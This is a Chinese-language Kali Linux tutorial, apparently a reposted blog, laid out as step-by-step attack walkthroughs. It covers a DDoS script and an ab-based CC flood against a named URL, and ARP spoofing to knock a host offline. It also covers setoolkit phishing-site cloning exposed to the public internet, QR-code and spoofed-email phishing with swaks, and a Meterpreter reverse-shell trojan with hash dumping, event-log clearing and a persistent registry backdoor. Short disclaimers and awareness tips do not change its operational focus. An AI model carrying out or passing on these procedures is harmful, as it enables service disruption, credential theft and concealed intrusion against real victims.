Kali常見攻擊手段
注意:
僅用于教程和科普,切勿做違法之事,否則後果自負
1 網絡攻擊手段
請正确使用DDos和CC攻擊,不要用來做違反當地法律法規的事情,否則後果自負
使用之前kali需要能夠上網
參考:kali安裝
1.1 DDos攻擊
- 打開指令行,下載下傳對應ddos資料包
git clone https://github.com/Andysun06/ddos
- 進入資料包對應的檔案夾(區分大小寫)
cd ddos
-
執行腳本
本文用于示範的kali是2020年版本,用python執行ddos-p2.py,輸入指令:
python ddos-p2.py
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLmNTY1UjNkhzMiFGZmRWM4gjMiRzM2M2YmhDMkZWN4YzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
然後會出現如下界面:
然後輸入攻擊對象的IP(本教程以我的網站為例)
再打開一個指令行視窗:
ping + 域名
# 得到ip
4. 配置參數
- ip: 攻擊對象
- Attack Port即攻擊端口,一般伺服器預設為80(更多内容請百度)
- Attack Speed即攻擊速度,數值越大越快,最大不能超過1000
Kali常見攻擊手段Kali常見攻擊手段
- 發起攻擊
按下回車,出現如下界面表示攻擊成功:![]()
Kali常見攻擊手段Kali常見攻擊手段
1.2 CC攻擊
- DDoS攻擊的一種類型
- CC (ChallengeCollapsar,挑戰黑洞)攻擊是DDoS攻擊的一種類型,使用代理伺服器向受害伺服器發送大量貌似合法的請求
- 以root身份打開指令行
- 輸入指令
ab -n 參數1 -c 參數2 網站位址
參數一是并發數(請求的使用者量)
參數二是發送總量(請求的總次數)
(有興趣的可以在百度上另外學習)
參數1,參數2和網站位址由自己設定,這裡以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 為例:
出現如下界面表示攻擊成功:
DDos與CC攻擊差別:
1,CC攻擊(流量不大,真實IP)
通常是應用層攻擊,攻擊對象是網頁,涉及的協定主要是HTTP,HTTPS,消耗的是伺服器的CPU資源(通過請求大量調用CPU的資源,例如查詢資料庫)
2,DDOS攻擊(流量很大,僞造IP)
通常是網絡層和傳輸層,攻擊對象是IP,涉及協定主要是IP,UDP和TCP,通常消耗的是網絡帶寬
1.3 ARP欺騙
首先,ARP欺騙需要用到dsniff資料包(arpspoof 是 dsniff 的一個附屬工具,是以我們需要安裝的是 dsniff),安裝指令如下:
- 安裝dsniff
- 确定網卡名稱和位址
3. 嗅探ip裝置
嗅探你所在WLAN下所有裝置的IP位址,指令如下:
fping -g 本機IP位址/24
例如我的IP是192.168.145.98,指令就是fping -g 192.168.145.98/24
我的另一台裝置就出現在了這裡:192.168.145.26,是一台PC(centos)
4. 發起攻擊
發起攻擊之前,先檢視我192.168.145.26(目标主機)的網速
結果:基本耗時在50ms左右
輸入指令發起攻擊:
arpspoof -i 你的網卡名稱 -t 攻擊目标的IP位址 攻擊目标的網關位址
網卡名稱的檢視上文已經提過,我以我的網卡為例,名稱是eth0,攻擊目标就是我的另一台PC,IP是192.168.145.26
因為我用的是虛拟機,并且我PC的網關配置的是192.168.145.2,是以我攻擊指令如下(一般來說網關配置為xxx.xxx.xxx.1,也就是ip最後一位改為1):
arpspoof -i eth0 -t 192.168.145.26 192.168.145.2
按下回車發起攻擊,出現如下頁面表示攻擊成功:
-
檢視效果
現在,我的另一台PC基本上無法上網了,這就說明我們的ARP欺騙成功了。
Kali常見攻擊手段Kali常見攻擊手段 如果你想停止攻擊,就按下Ctrl+Z,攻擊就停止了。Kali常見攻擊手段Kali常見攻擊手段
2 社會工程學攻擊(setoolkit)
2.1 搭建釣魚網站
釣魚網站是黑客常用的用于盜取目标使用者名與賬号的方式,今天主要介紹 setoolkit
來制作釣魚網站
setoolkit是kali下的社會工程學工具集。
①進入setoolkit
指令行輸入:
setoolkit
②選擇社會工程學攻擊 - 網絡攻擊 - 釣魚網站
社會工程學攻擊
快速追蹤測試
第三方子產品
更新軟體
更新配置
幫助123456
- 在上圖中,我們選擇
,社會工程學攻擊,進入到下圖頁面1
Kali常見攻擊手段Kali常見攻擊手段
魚叉式網絡攻擊
網頁攻擊
傳染媒介式
建立payload和listener
郵件群發攻擊
Arduino基礎攻擊
無線接入點攻擊
二維碼攻擊
Powershell攻擊
第三反方子產品12345678910
- 上圖中輸入
,選擇社會工程學中的網絡攻擊,進入到下圖頁面:2
Kali常見攻擊手段Kali常見攻擊手段
Java applet攻擊
Metasploit浏覽器攻擊
釣魚網站攻擊
标簽釣魚攻擊
網站jacking攻擊
多種網站攻擊
全螢幕攻擊1234567
- 上圖中選擇
,進入釣魚網站攻擊,進入下圖頁面:3
Kali常見攻擊手段Kali常見攻擊手段
網站模闆
站點克隆
用自己的網站123
如果選擇網站模闆的話,會有幾個預設的登陸界面的模闆
如果想克隆指定的頁面的話,就選擇2站點克隆,當然,這個功能雖然強大,但是有的網站是無法克隆的,如果無法克隆,就選擇3,自己制作一樣的網站去釣魚。這裡我詳細講一下站點克隆的方法。
登入頁面模闆:
- 輸入
,選擇google登入模闆:2
Kali常見攻擊手段Kali常見攻擊手段 - kali監聽效果:
Kali常見攻擊手段Kali常見攻擊手段
③站點克隆
選擇完2之後,需要我們輸入一些資訊
- 上圖中選擇
,選擇網站克隆,進入如下頁面:2
Kali常見攻擊手段Kali常見攻擊手段
這個是我們克隆完之後的網站傳回的ip位址,一般就寫虛拟機的IP位址
# 此處我的虛拟機ip為192.168.145.98
這個是我們克隆完之後的網站傳回的ip位址,一般就寫虛拟機的IP位址,然後我們需要填寫想要克隆的網站的url
回車之後,顯示如下資訊就代表克隆完成
④kali擷取使用者名、密碼
我們将賬号和密碼都設為admin,點選登陸,發現有跳轉到了真正的頁面,也不會傳回賬号資訊錯誤的界面,同時,kali也将我們輸入的資訊截獲了,并在終端顯示
⑤結合内網穿透實作公網可通路
本次使用DVWA的登入頁面試驗
内網穿透工具選擇
花生殼
-
到官網上下載下傳花生殼并安裝
花生殼官網
- 新增映射
Kali常見攻擊手段Kali常見攻擊手段 - 使用https映射認證
該服務需要花費6元
- 配置映射
内網主機ip填寫kali的ip即可
Kali常見攻擊手段Kali常見攻擊手段 - 新增映射
是以,這裡就隻需要我們将kali的IP以及端口(80)填入即可映射到外網了
但是前面也說過http協定是收費的,6塊,但是能用很久個人覺得倒是不貴。
好,那現在就讓我們去到最後一步!用Custom Import和花生殼去 釣 魚 ~~
⑥公網釣魚
注意:
本文僅供學習之用,嚴禁做違法之事!
資料:
一、DVWA:
連結:https://pan.baidu.com/s/1ketwjg_wm5DSvCFNb20K2A
提取碼:sljb
- 将dvwa檔案拖至/root目錄下,如果拖拽有問題上文有請自行查閱
Kali常見攻擊手段Kali常見攻擊手段 - 開啟setoolkit
①. 打開終端輸入setoolkit
②. 選擇1社會工程學攻擊
③. 選擇2,網站攻擊
④,選擇3,釣魚網站
⑤,選擇3,使用者導入【預設,回車即可】
⑥,選擇導入的路徑【/root/dvwa】
⑦,選擇2,導入整個檔案夾
⑧,配置内網穿透
⑨,通過域名通路,檢視kali監聽結果
選擇使用者導入之後,會出現如下頁面,如果是預設,直接回車即可
3
如果預設就直接回車。(如果選擇域名,就需要将域名解析到該主機) 我們預設直接回車
下面我們選擇 2
,導入整個檔案夾
3. 配置内網穿透服務
4. 測試結果
輸入網址通路:https://****.****.fun/
⑦克隆網站指令全過程
如果想要實作公網釣魚,參照 ⑥
即可
1. setoolkit
2. 輸入1
3. 輸入2
4. 輸入3
5. 輸入2
6. 輸入kali虛拟機ip(或自己搭建的kali的ip)
7. 輸入克隆的網站位址
8. 通過kali的ip通路克隆網站位址
- 原網站:
Kali常見攻擊手段Kali常見攻擊手段 - 克隆網站:
Kali常見攻擊手段Kali常見攻擊手段
大家也可以看到,釣魚網站的制作其實并不難,是以我們平常在通路一些常用的有賬号登陸的地方一定要看清楚url,防止被釣魚。
2.2 二維碼
SET 工具包中使用QR Code Attack子產品發起二維碼攻擊,使被欺騙使用者掃描你的二維碼進入一個僞裝釣魚網站。有人肯定會認為那這個軟體沒啥用,但是請問正常情況下,給你一個二維碼和一個未知網址,你更願意相信哪一個?答案當然是二維碼。
以下是對應指令:
1. setoolkit
2. 輸入1,社會工程學攻擊
3. 輸入8,二維碼攻擊
4. 輸入對應網站url(以合天為例:www.hetianlab.com)
二維碼生成路徑(預設):
/root/.set/reports/
結果:
然而使用手機微信掃描出來的結果如下:
需要使用手機UC浏覽器掃描才可以跳轉到相應網站。
以上 Kali 顯得太垃圾了……推薦一個線上二維碼生成平台(
草料
二維碼生成),可生成在微信即可掃描并跳轉的二維碼并且種類豐富,大可為所欲為。
生成的二維碼在手機微信掃描的效果如下:
【小結】以上的攻擊示範告訴我們幾點:
- 不要輕易打開一個安全性未知的網站連結或者去掃描二維碼,并且傻乎乎地輸入自己的賬号密碼等敏感資訊,你看到的網站不一定是真的(現實中攻擊者會綁定公網IP、公網域名來以假亂真);
- 同時請務必留意,不要輕易連接配接安全性未知的WIFI,因為一旦你進入攻擊者設定的WIFI,攻擊者完全可以利用區域網路内部的DNS欺騙攻擊,使得你通路www.baidu.com這樣的域名都能跳轉到他指定的釣魚網站!
2.3 釣魚郵件
當攻擊者制作了釣魚網站、木馬程式後,便會想法設法将其傳給受害者,而常見的傳播方式便是釣魚網站了。安全意識較差的使用者在收到釣魚郵件後點選郵件中的釣魚連結、下載下傳附件中的木馬程式,便可能遭受攻擊!
工具簡述
Swaks 是一款類似于“瑞士軍刀”的工具,之是以這麼說是因為它在SMTP郵件協定領域有非常非常廣泛的應用,同時對于一名資訊安全進階工程師來說也是一個不錯的利用工具!它通常被用來僞造郵件,進行釣魚、社工等操作。
Swaks基本用法:
1、swaks --to [email protected] 測試郵箱的連通性;
2、參數說明(這裡隻是簡單的羅列了一些,至于更加具體的内容可以使用–help進行檢視了解):
--from [email protected] //發件人郵箱;
--ehlo qq.com //僞造郵件ehlo頭,即是發件人郵箱的域名。提供身份認證
--body "http://www.baidu.com" //引号中的内容即為郵件正文;
--header "Subject:hello" //郵件頭資訊,subject為郵件标題
--data ./Desktop/email.txt //将正常源郵件的内容儲存成TXT檔案,再作為正常郵件發送;
kali内置了swaks,檢視版本 swaks -v
-
建立一個臨時郵箱,用于接收郵件
建立位址:https://www.linshi-email.com/
- 發起攻擊
僞造一份來自 360hr 的郵件,收件人為[email protected],内容為:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”,如下圖所示:
- 檢視臨時郵箱,此時可以收到郵件消息
Kali常見攻擊手段Kali常見攻擊手段
“===”:swaks輸出的資訊行
“*“:swaks中産生的錯誤
” ->”:發送到目标的預期行(無錯誤)
“<- “:伺服器的預期回複(無錯誤)
“<**”:伺服器傳回的錯誤資訊
發送郵件的時候添加上附件
拓展:
--attach
swaks --to [email protected] --from [email protected] --ehlo 360.cn --body "this is your offer.please open the attach" --attach offer.txt
offer.txt需要在目前目錄下點開郵件:![]()
Kali常見攻擊手段Kali常見攻擊手段 ![]()
Kali常見攻擊手段Kali常見攻擊手段
但是,QQ郵箱和網易雲郵箱暫不可送達,應該是騰訊、網易設定的安全機制的原因!在此提醒遇到可疑郵件要檢視源郵件,判斷發信人IP是否為可信任的IP,不然一個貿然的操作有時候将可能導緻自己被釣魚甚至攻擊!
2.4 遠端木馬
SET 同時內建了木馬生成工具,可以生成木馬并調用MSF架構對遠端主機進行控制。
2.4.1 生成木馬并上傳到靶機
1. set
2. 選擇1,社會工程學攻擊
3. 選擇4,建立攻擊載荷和監聽器
4. 選擇2,攻擊模式選擇reverse_tcp meterpreter
5. 輸入ip位址(監聽的主機ip,kali的ip位址)和端口(随機,隻要不被占用即可)
預設生成木馬位址:
root/.set
将木馬上傳到靶機:
2.4.2 執行木馬,操控主機
輕按兩下執行木馬,檢視結果![]()
Kali常見攻擊手段Kali常見攻擊手段
激活 Meterpreter 會話,獲得 Shell 後即可操控 Win 7 靶機,如下圖所示:
# 選擇會話中的第一個目标
sessions -i 1
- 操縱主機
可輸入help指令檢視 Meterpreter 支援的所有攻擊指令和描述
截圖效果:
- 執行
進行提權攻擊getsystem
Kali常見攻擊手段Kali常見攻擊手段 - 擷取密碼(windows的密碼其實就是藏在一個目錄下的hash值)
執行指令hashdump,嘗試擷取系統所有賬戶的密碼的hash值,發現失敗。沒關系,可以執行Meterpreter 提供的腳本:
- 遠端監控win7
run vnc
進一步的攻擊還可以執行background将目前會話轉移到背景執行,達到背景程序切換的目的。同時可以執行migrate 指令遷移會話程序到指定的程序pid,達到隐藏控制會話的程序,此時原來的程序是看不到的目的(通過ps指令可以看到受害機的哪些程序)
2.4.3 日志清除
為了不暴露攻擊者的痕迹行為,需要清除系統事件
- 先打開 Windows 事件檢視器,檢視清理之前的日志記錄
win + r,輸入:eventvwr
- 在 Meterpreter 執行指令 clearev 指令,對靶機的日志進行清除,如下圖所示:
但該指令存在的弊端的是,沒法指定清除哪一部分的日志,一次性清除容易引起系統管理者的注意。
注意:
如果不小心ctrl+Z退出了控制台,可以通過如下指令恢複
# jobs 檢視目前被挂起的程序對應的号碼
jobs
# 将任務調至前台繼續運作
fg %jobnumber(是指令編号,不是程序号)
如果不小心退出了msf的會話,重新打開setoolkit,設定相同的ip和端口即可恢複
2.4.4 建立後門
當成功擷取目标系統的通路權限後,需要尋找方法來恢複與目标主機的連接配接,而無需再進入目标系統。如果目标使用者破壞了該連接配接,例如重新啟動計算機,此時使用後門将允許自動重新與目标系統建立連接配接。為了後續滲透友善,是以需要建立一個後門,這樣即使連接配接被中斷也不會影響工作。
- 建立持久後門之前,先檢視下它的幫助檔案,如下所示:
2. 執行指令建立一個持久後門,輸出的資訊将顯示建立後門的一個過程。Kali 将在目标系統中建立了一個持久腳本
(儲存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改系統資料庫,如下所示:
3. 檢視 Win 7 靶機的系統資料庫和系統檔案
4. 為了驗證後門是否可利用,關閉目前攻擊會話,重新開機 Win 7 虛拟機
此時在 Kali 虛拟機重新開啟一個終端,運作 MSF 架構,監聽 Win 7 虛拟機是否重新開機後能自動上線獲得攻擊會話:至此,後門植入成功!以後隻要Win 7系統開機便會自動運作後門腳本,攻擊者可以随時入侵!除非受害主機的管理者發現後删除了系統資料庫相應的鍵值和系統中植入的後門腳本。此時即使 Win 7 靶機中的遠控木馬檔案 payload.exe 被管理者删除也沒關系,隻不過功能受限![]()
Kali常見攻擊手段Kali常見攻擊手段
2.4.5 常用指令
運作虛拟桌面:run vnc
擷取hash值:run hashdump
檢視檔案夾:ls
将會話置于背景:background
檢視運作時間:idletime
檢視目前使用者身份:getuid
檢視目前使用者具備的權限:getprivs
檢視目前程序PID:getpid
檢視目标機系統資訊:sysinfo
檢視正在運作的程序:ps
搜尋、拷貝、上傳檔案(需要擁有system權限,可以利用getsystem、MS16-032漏洞進行提權)
(1)搜尋c盤内所有以txt為字尾的檔案:search -f *.txt -d c:\
(2)拷貝檔案至kali内:download c:\1.txt /root
(3)上傳檔案至win7:upload /home/zidian/msfadmin.txt c:\
重新開機/關機:reboot / shutdown -h now
進入cmd:shell
擷取cmd之後的常用指令:
檢視目前使用者:whoami
添加使用者和對應密碼:net user [username] [password] /add
檢視目前計算機中的詳細情況:systeminfo
關閉防火牆:netsh adcfirewall set allprofiles state off
檢視目前計算機中網絡連接配接通信情況:netstat -ano
msf常用指令
參考:https://cloud.tencent.com/developer/article/1808932
https://www.freebuf.com/articles/network/317596.html
參考文章:
https://blog.csdn.net/a_n_d_y_s_u_n__/article/details/118528019